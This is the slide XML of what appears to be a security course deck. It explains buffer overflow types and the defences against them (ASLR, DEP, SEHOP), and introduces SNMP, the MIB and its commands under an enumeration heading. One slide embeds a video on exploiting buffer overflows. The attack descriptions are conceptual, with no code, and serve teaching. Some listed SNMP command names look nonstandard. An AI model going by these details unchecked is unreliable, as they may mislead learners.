            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{F758F499-FEBD-4BC1-8045-3ED7AE804FF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C46EB06-335C-45E5-96F5-51CEE044BF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="3311671"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dirty="0"/>
              <a:t>7. Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{E50CCBFA-8B30-4E7A-8520-8A6A2A9E92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22F44E-2362-4B37-8A6F-02149ABEC0E4}"/>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32192FDC-DDB1-479E-A0E8-A7EC6199A1D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AC1AF7BD-14F6-489A-AF3D-97D5FBD932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8B5B9B5-A289-4D38-AD83-120C0E9D8478}"/>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Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{F7DC3976-665E-45FF-AB28-06B290E87DA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E7D4EA2-AA09-48F0-BB5D-8F41F99CAEBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Stack-based buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: This is the most common form of buffer overflow attack. The stack-based approach occurs when an attacker sends data containing malicious code to an application, which stores the data in a stack buffer. This overwrites the data on the stack, including its return pointer, which hands control of transfers to the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Heap-based buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: A heap-based attack is more difficult to carry out than the stack-based approach. It involves the attack flooding a program’s memory space beyond the memory it uses for current runtime operations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Format string attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: A format string exploit takes place when an application processes input data as a command or does not validate input data effectively. This enables the attacker to execute code, read data in the stack, or cause segmentation faults in the application. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{1D9B9DE7-970B-4356-ACFA-FF5C061AECA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9CF1AF2-8261-4599-82A4-E6874FE5A52D}"/>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0B9D685E-B76C-4948-84B2-9F729F5D26D7}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{A011117E-1920-445B-927F-81990E16318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16FF996-E1B2-48B0-84EE-DF00671FA5AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="3311671"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dirty="0"/>
              <a:t>7. Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{4291E845-F8AD-4DC7-93E7-13E0AA7294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8935EC-E646-4279-937C-2CD72F460841}"/>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E3CAADA8-9A96-47FD-A091-8FD40312805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68FC5534-3108-4F81-A2E6-70584F3D49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AAD20D-8CBB-4CD6-B68D-881351109D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371351" y="1171203"/>
            <a:ext cx="5909452" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{7F966728-C360-4042-9B89-EEC049C611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93829E-B10E-4FE7-8DDC-F12D36D9246E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Address space layout randomization (ASLR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: Buffer overflow attacks typically need to know where executable code is located. ASLR moves at random around locations of data regions to randomize address spaces, which makes overflow attacks almost impossible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Data execution prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: This method prevents an attack from being able to run code in non-executable regions by flagging areas of memory as executable or non-executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Structured exception handling overwrite protection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SEHOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>: Attackers may look to overwrite the structured exception handling (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SEH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>), which is a built-in system that manages hardware and software exceptions. They do this through a stack-based overflow attack to overwrite the exception registration record, which is stored on the program’s stack. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SEHOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> prevents attackers’ malicious code from being able to attack the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SEH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> and use its overwrite exploitation technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{DE7ED382-7A83-4DFE-9ED0-B0E20F36CE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EECB5B-1443-49E1-AF7E-14161FBAF31B}"/>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C579ADF1-89F0-4AF4-976B-9D990AB6D528}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{8AA2EC83-3389-4E3E-B4BF-9A1B4B0AF06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310AF1-11CB-4B17-B4E3-440B8CB1083C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="3311671"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dirty="0"/>
              <a:t>7. Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{94DB77A5-D534-46A1-AC02-13FC76FBEE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A97A40-32CD-4E40-850E-A34713F947D1}"/>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007C7EBC-7F0A-4615-8C06-B950B2EA24A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9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BF5BF3D5-C708-918F-989A-723E4731FC10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Online Media 6" title="How to exploit a buffer overflow vulnerability - Practical">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284767B3-83E3-505F-2F2D-591B25241C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noRot="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <a:videoFile r:link="rId1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236537" y="34848"/>
            <a:ext cx="8670925" cy="4895242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237952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FE368454-E896-4F70-B38C-FD1037B9A2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5E875F3-6BE7-4932-AF17-8C4DD91204AC}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Management Information Base (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MIB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{69765028-B1D3-468D-B27B-4B5ED95E85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3142C76-8323-49F9-AD17-46B85DB9B735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>The SNMP Management Information Base (MIB) is a database that contains information about the network device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>When the Network Management System (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>NMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>) sends a ‘get’ request for information about a managed device on the network, the agent service returns a structured table with data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This table is what is called the Management Information Base (MIB).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>MIB values are indexed using a series of numbers with dots. For example, MIB value 1.3.6.1.2.1.1.1 refers to the system description (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>sysDescr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>) and value 1.3.6.1.2.1.1.6 refers to the system location (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>sysLocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FD435D2A-274F-4378-8011-6F2D3944BD8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AA4E19-1C58-4FEB-87F4-CF05AC9F8948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{892E3E26-BA50-4C23-B2F4-2736B08CBB1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8007A12-909E-402E-9BFC-55516CECFDD3}"/>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8C5BA7A0-032E-496A-AA96-EB279712616D}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{0645617C-420C-4D3C-8BAC-A0A1E3FE151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E170A1-CE96-4A78-BA93-1A446F8EA458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{988B1154-629A-4086-8E80-BF3CFD6D3B9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9CD8B4-7851-4A4D-98B2-29702427782C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{07DBB16B-40FF-4BA2-BCBE-71A38C9B603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528FCA-C0DD-401A-A971-4472965DA773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{287368B4-E036-4622-83A4-DE2A1E3EE9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1B8025D-3ECE-44DE-A78C-28C3E11EEE97}"/>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95284177-C7A0-47B7-8ABC-F211D7B28C6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D8A12C10-9DA3-4183-9C5D-7EF2ADB3DA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F20C4A1-A0B8-4172-A95F-6CCAA534676C}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FCD60BFB-7B32-4D46-BDFA-951DAE38B49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10760F-22A2-4917-91A2-B62790A901AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Read commands are sent by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>NMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to nodes for monitoring purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Write commands are used to control the nodes in the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>The trap commands are used for unsolicited SNMP messages from a device’s agent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>NMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to inform the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>NMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> about certain events such as errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Traversal commands are used to check what information is retained on a managed device and to retrieve it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpstart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, snmpgetnext, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpwait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
